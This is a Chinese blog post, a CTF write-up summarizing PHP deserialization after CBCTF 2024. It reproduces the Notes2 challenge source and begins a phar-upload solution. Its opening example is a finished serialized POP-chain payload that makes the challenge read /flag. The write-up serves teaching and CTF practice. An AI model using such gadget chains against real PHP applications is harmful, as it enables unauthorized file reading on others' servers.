

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/myavatar.jpg">
  <link rel="icon" href="/img/myavatar.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="5i1encee">
  <meta name="keywords" content="">
  
    <meta name="description" content="CBCTF后的一个PHP反序列化小结......">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP反序列化小结">
<meta property="og:url" content="http://5i1encee.top/2025/02/01/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%8F%E7%BB%93/index.html">
<meta property="og:site_name" content="5i1encee&#39;s Blog">
<meta property="og:description" content="CBCTF后的一个PHP反序列化小结......">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://5i1encee.top/img/PHP.png">
<meta property="article:published_time" content="2025-02-01T10:17:47.000Z">
<meta property="article:modified_time" content="2025-02-01T11:51:46.736Z">
<meta property="article:author" content="5i1encee">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="web">
<meta property="article:tag" content="反序列化">
<meta property="article:tag" content="PHP">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://5i1encee.top/img/PHP.png">
  
  
  
  <title>PHP反序列化小结 - 5i1encee&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"5i1encee.top","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":60,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"jjGGn76maTdishPRDEFNvls9-gzGzoHsz","app_key":"FJ9un1wEMLCu0LBShqweCwNF","server_url":"https://jjggn76m.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>5i1encee</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/PHP.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="PHP反序列化小结"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        5i1encee
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-02-01 18:17" pubdate>
          2025年2月1日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          39 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">PHP反序列化小结</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="PHP反序列化小结"><a href="#PHP反序列化小结" class="headerlink" title="PHP反序列化小结"></a>PHP反序列化小结</h1><h1 id="什么是序列化与反序列化"><a href="#什么是序列化与反序列化" class="headerlink" title="什么是序列化与反序列化"></a>什么是序列化与反序列化</h1><p>首先，序列化是将对象转化为可存储或传输的字符串格式的过程。在 php 中，可以使用 serialize()函数将对象，数组或其它数据类型序列化称为一个字符串，以便将其保存到文件或者进行网络传输。</p>
<p>反序列化则是将之前序列化得到的字符串重新转换为原始的 php 数据结构或对象的过程。在 php 中，可以使用 unserialize()函数对序列化后的字符串进行反序列化操作。</p>
<p>如下即为某个对象序列化后的字符串样式</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">O:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;_0rays&quot;</span>:<span class="hljs-number">2</span>:&#123;s:<span class="hljs-number">3</span>:<span class="hljs-string">&quot;jbn&quot;</span>;s:<span class="hljs-number">7</span>:<span class="hljs-string">&quot;phpinfo&quot;</span>;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;pankas&quot;</span>;O:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;lets&quot;</span>:<span class="hljs-number">4</span>:&#123;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;mak4r1&quot;</span>;s:<span class="hljs-number">3</span>:<span class="hljs-string">&quot;asc&quot;</span>;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;ech0&quot;</span>;N;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;rocket&quot;</span>;O:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;lets&quot;</span>:<span class="hljs-number">4</span>:&#123;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;mak4r1&quot;</span>;N;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;ech0&quot;</span>;O:<span class="hljs-number">2</span>:<span class="hljs-string">&quot;go&quot;</span>:<span class="hljs-number">1</span>:&#123;s:<span class="hljs-number">8</span>:<span class="hljs-string">&quot;ed_xinhu&quot;</span>;O:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;lets&quot;</span>:<span class="hljs-number">4</span>:&#123;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;mak4r1&quot;</span>;N;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;ech0&quot;</span>;N;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;rocket&quot;</span>;N;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;errmis&quot;</span>;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;/flag&quot;</span>;&#125;&#125;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;rocket&quot;</span>;N;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;errmis&quot;</span>;N;&#125;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;errmis&quot;</span>;N;&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>序列化的意义主要在于方便数据的存储和传输。</p>
<h1 id="反序列化漏洞的产生、利用原理"><a href="#反序列化漏洞的产生、利用原理" class="headerlink" title="反序列化漏洞的产生、利用原理"></a>反序列化漏洞的产生、利用原理</h1><p>反序列化漏洞的产生主要因为存在一些含魔术方法的可利用的类、用户可控的参数，通过设计各个类的属性参数，实现反序列化时各个魔术方法的自动（连锁）调用从而执行目的操作。目前我所接触到的一般的 PHP 反序列化漏洞通常搭配文件上传，服务器接收序列化的文件后我们通过一些操作让服务器对其进行反序列化处理。</p>
<h1 id="魔术方法"><a href="#魔术方法" class="headerlink" title="魔术方法"></a>魔术方法</h1><p>（这里主要都是 PHP，其他的可能类似，还没有研究）</p>
<p>魔术方式是在特定情况下会自动调用的特殊方法，会覆盖 PHP 的默认操作，可以自定义方法的内容。做一些反序列化的题目时需要熟练掌握各个魔术方法的调用条件。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">__construct</span>():具有构造函数的类会在每次创建新对象时先调用此方法。<br><span class="hljs-title function_ invoke__">__destruct</span>():析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行。<br><span class="hljs-title function_ invoke__">__toString</span>():方法用于一个类被当成字符串时应怎样回应。例如<span class="hljs-keyword">echo</span> <span class="hljs-variable">$obj</span>;应该显示些什么。 此方法必须返回一个字符串，否则将发出一条 E_RECOVERABLE_ERROR 级别的致命错误。 <br><span class="hljs-title function_ invoke__">__sleep</span>()方法在一个对象被序列化之前调用；<br><span class="hljs-title function_ invoke__">__wakeup</span>():<span class="hljs-title function_ invoke__">unserialize</span>( )会检查是否存在一个<span class="hljs-title function_ invoke__">_wakeup</span>( )方法。如果存在，则会先调用_wakeup方法，预先准备对象需要的资源。<br><span class="hljs-title function_ invoke__">__get</span>():当调用一个类及其父类方法中未定义的**属性**时<br><span class="hljs-title function_ invoke__">__set</span>():当设置一个类及其父类方法中未定义的**属性**时<br><span class="hljs-title function_ invoke__">__invoke</span>():调用函数的方式调用一个对象时的回应方法<br></code></pre></td></tr></table></figure>

<p>更全的魔术方法信息参考：<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.oop5.magic.php">https://www.php.net/manual/zh/language.oop5.magic.php</a></p>
<h1 id="反序列化例题"><a href="#反序列化例题" class="headerlink" title="反序列化例题"></a>反序列化例题</h1><h2 id="CBCTF2024-Notes2"><a href="#CBCTF2024-Notes2" class="headerlink" title="CBCTF2024 Notes2"></a>CBCTF2024 Notes2</h2><p>题目提供了源码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-comment">// easy unserialize chain OuO</span><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">notes</span></span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$filepath</span></span>)</span>&#123;<br>        <span class="hljs-title function_ invoke__">readfile</span>(<span class="hljs-variable">$filepath</span>);<br>    &#125;<br>&#125;<br><br><span class="hljs-comment">// flag in /flag , let&#x27;s go !!</span><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">_0rays</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$jbn</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$pankas</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-variable">$this</span> -&gt; jbn))&#123;<br>            <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-built_in">Exception</span>(<span class="hljs-variable language_">$this</span> -&gt; pankas);<br>        &#125;<span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;ha?&quot;</span>;<br>        &#125;<br>    &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">lets</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-built_in">static</span> <span class="hljs-variable">$yolbby</span> = <span class="hljs-string">&quot;nonono&quot;</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$mak4r1</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$ech0</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$rocket</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$errmis</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__toString</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable">$humb1e</span> = <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$this</span> -&gt; mak4r1);<br>        <span class="hljs-variable">$k0rian</span> = <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$humb1e</span>,-<span class="hljs-number">4</span>,-<span class="hljs-number">1</span>);<br>        <span class="hljs-variable language_">$this</span> -&gt; rocket -&gt; dbg = <span class="hljs-variable">$k0rian</span>;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;O.o?&quot;</span>;<br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__set</span>(<span class="hljs-params"><span class="hljs-variable">$a</span>, <span class="hljs-variable">$b</span></span>)</span>&#123;<br>        <span class="hljs-built_in">self</span>::<span class="hljs-variable">$yolbby</span> = <span class="hljs-variable">$b</span>;<br>        <span class="hljs-variable">$int_barbituric</span> = <span class="hljs-variable language_">$this</span> -&gt; ech0 -&gt; gtg;<br><br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">notes</span>(<span class="hljs-variable">$this</span> -&gt; errmis);<br>    &#125;<br><br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">go</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$ed_xinhu</span>;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__get</span>(<span class="hljs-params"><span class="hljs-variable">$c</span></span>)</span>&#123;<br>        <span class="hljs-keyword">if</span>(lets::<span class="hljs-variable">$yolbby</span> === <span class="hljs-string">&quot;666&quot;</span>)&#123;<br>            <span class="hljs-variable">$dilvey</span> = <span class="hljs-variable language_">$this</span> -&gt; ed_xinhu;<br>            <span class="hljs-keyword">return</span> <span class="hljs-variable">$dilvey</span>();<br>        &#125;<span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;you are going to win !&quot;</span>;<br>        &#125;<br>    &#125;<br><br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">check</span>(<span class="hljs-params"><span class="hljs-variable">$filePath</span></span>) </span>&#123;<br>    <span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">file_exists</span>(<span class="hljs-variable">$filePath</span>))&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>    &#125;<br>    <span class="hljs-variable">$realPath</span> = <span class="hljs-title function_ invoke__">realpath</span>(<span class="hljs-variable">$filePath</span>);<br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">strpos</span>(<span class="hljs-variable">$realPath</span>, <span class="hljs-string">&#x27;/notes&#x27;</span>) === <span class="hljs-number">0</span> ) &#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>; <br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">listnote</span>(<span class="hljs-params"></span>) </span>&#123;<br>    <span class="hljs-variable">$directory</span> = <span class="hljs-string">&#x27;/notes&#x27;</span>; <br>    <span class="hljs-variable">$files</span> = <span class="hljs-title function_ invoke__">array_filter</span>(<span class="hljs-title function_ invoke__">scandir</span>(<span class="hljs-variable">$directory</span>), function (<span class="hljs-variable">$file</span>) <span class="hljs-keyword">use</span> ($<span class="hljs-title">directory</span>) &#123;<br>        <span class="hljs-title">return</span> <span class="hljs-title">is_file</span>(&quot;$<span class="hljs-title">directory</span>/$<span class="hljs-title">file</span>&quot;);<br>    &#125;);<br>    <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$files</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$f</span>) &#123;<br>        <span class="hljs-variable">$link</span> = <span class="hljs-string">&#x27;&lt;a href=&quot;/index.php?note=/notes/&#x27;</span> . <span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$f</span>) . <span class="hljs-string">&#x27;&quot;&gt;&#x27;</span> . <span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$f</span>) . <span class="hljs-string">&#x27;&lt;/a&gt; &lt;p&gt;&lt;/p&gt;&#x27;</span>;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable">$link</span>;<br>    &#125;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;&lt;a href=&quot;/index.php?note=show-me-source&quot;&gt;show source&lt;/a&gt;&#x27;</span>;<br>&#125;<br><br><span class="hljs-comment">// upload your own note ? (under development)</span><br><span class="hljs-keyword">if</span> (<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;REQUEST_METHOD&#x27;</span>] === <span class="hljs-string">&#x27;POST&#x27;</span>) &#123;<br>    <span class="hljs-variable">$file</span> = <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;user_note&#x27;</span>] ?? <span class="hljs-literal">null</span>;<br>    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$file</span> &amp;&amp; <span class="hljs-title function_ invoke__">strtolower</span>(<span class="hljs-title function_ invoke__">pathinfo</span>(<span class="hljs-variable">$file</span>[<span class="hljs-string">&#x27;name&#x27;</span>], PATHINFO_EXTENSION)) === <span class="hljs-string">&#x27;txt&#x27;</span>) &#123;<br>        <span class="hljs-variable">$randomFileName</span> = <span class="hljs-title function_ invoke__">uniqid</span>() . <span class="hljs-string">&#x27;.txt&#x27;</span>;<br>        <span class="hljs-variable">$targetFilePath</span> = <span class="hljs-string">&quot;/notes/&quot;</span> . <span class="hljs-variable">$randomFileName</span>;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">move_uploaded_file</span>(<span class="hljs-variable">$file</span>[<span class="hljs-string">&#x27;tmp_name&#x27;</span>], <span class="hljs-variable">$targetFilePath</span>)) &#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Your note successfully saved in :&quot;</span>.<span class="hljs-variable">$targetFilePath</span>;<br>            <span class="hljs-keyword">exit</span>;<br>        &#125;<br>    &#125;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;error&quot;</span>);   <br>&#125;<br><br><span class="hljs-variable">$note</span> = @<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;note&#x27;</span>];<br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$note</span>)&#123;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-variable">$note</span> === <span class="hljs-string">&quot;show-me-source&quot;</span>)&#123;<br>        <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>    &#125;<span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">check</span>(<span class="hljs-variable">$note</span>))&#123;<br>            <span class="hljs-title function_ invoke__">header</span>(<span class="hljs-string">&#x27;Content-Type: text/plain; charset=UTF-8&#x27;</span>);<br>            <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">notes</span>(<span class="hljs-variable">$note</span>);<br>        &#125;<span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;hacker...&quot;</span>);<br>        &#125;<br>    &#125;<br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h1&gt;这里是mak自己悄悄留给你的一些笔记哦，打开看看吧&lt;/h1&gt;&quot;</span>;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h2&gt;Notes List:&lt;h2&gt;&quot;</span>;<br>    <span class="hljs-title function_ invoke__">listnote</span>();<br>&#125;<br><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<h3 id="解题详细过程"><a href="#解题详细过程" class="headerlink" title="解题详细过程"></a>解题详细过程</h3><h4 id="1-初步观察分析，得到大致方向"><a href="#1-初步观察分析，得到大致方向" class="headerlink" title="1.初步观察分析，得到大致方向"></a>1.初步观察分析，得到大致方向</h4><p>很明确告知是反序列化题，可以在源码看到文件上传的接口，所以先上传序列化 phar 文件再触发反序列化</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">// upload your own note ? (under development)</span><br><span class="hljs-keyword">if</span> (<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;REQUEST_METHOD&#x27;</span>] === <span class="hljs-string">&#x27;POST&#x27;</span>) &#123;<br>    <span class="hljs-variable">$file</span> = <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;user_note&#x27;</span>] ?? <span class="hljs-literal">null</span>;<br>    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$file</span> &amp;&amp; <span class="hljs-title function_ invoke__">strtolower</span>(<span class="hljs-title function_ invoke__">pathinfo</span>(<span class="hljs-variable">$file</span>[<span class="hljs-string">&#x27;name&#x27;</span>], PATHINFO_EXTENSION)) === <span class="hljs-string">&#x27;txt&#x27;</span>) &#123;<br>        <span class="hljs-variable">$randomFileName</span> = <span class="hljs-title function_ invoke__">uniqid</span>() . <span class="hljs-string">&#x27;.txt&#x27;</span>;<br>        <span class="hljs-variable">$targetFilePath</span> = <span class="hljs-string">&quot;/notes/&quot;</span> . <span class="hljs-variable">$randomFileName</span>;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">move_uploaded_file</span>(<span class="hljs-variable">$file</span>[<span class="hljs-string">&#x27;tmp_name&#x27;</span>], <span class="hljs-variable">$targetFilePath</span>)) &#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Your note successfully saved in :&quot;</span>.<span class="hljs-variable">$targetFilePath</span>;<br>            <span class="hljs-keyword">exit</span>;<br>        &#125;<br>    &#125;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;error&quot;</span>);   <br>&#125;<br></code></pre></td></tr></table></figure>

<p>首先观察可利用的类及魔术方法：</p>
